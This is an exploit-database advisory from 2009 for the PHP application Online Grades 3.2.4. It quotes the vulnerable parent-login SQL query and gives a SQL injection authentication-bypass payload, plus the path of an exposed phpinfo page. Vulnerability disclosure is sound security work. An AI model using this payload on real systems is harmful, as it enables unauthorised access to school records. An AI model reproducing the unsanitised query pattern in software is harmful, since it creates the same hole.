Online Grades 3.2.4 - Authentication Bypass



EKU-ID: 15792 CVE: OSVDB-51713;CVE-2009-0479;OSVDB-51712;CVE-2009-0453;OSVDB-51711;CVE-2009-0452 OSVDB-ID:
Author: x0r Published: 2009-02-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################################################

    [0x01] Informations:
	Script : Online Grades 3.2.4
	Download : http://www.onlinegrades.org
	Vulnerability : Auth Bypass - Php Info Disclosure
	Author : x0r
	Contact : x0r@live.it \ andry2000@hotmail.it
	Website : NULL

#########################################################################################

    [0x02] Bug: /parents/login.php

	$username = $_POST['uname']; $pword = $_POST['pass'];
	$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';";

#########################################################################################

    [0x03] Exploit:
	Exploit: [validemail] ' or ' 1=1--

	Php Info: /includes/phpinfo.php

#########################################################################################

# milw0rm.com [2009-02-03]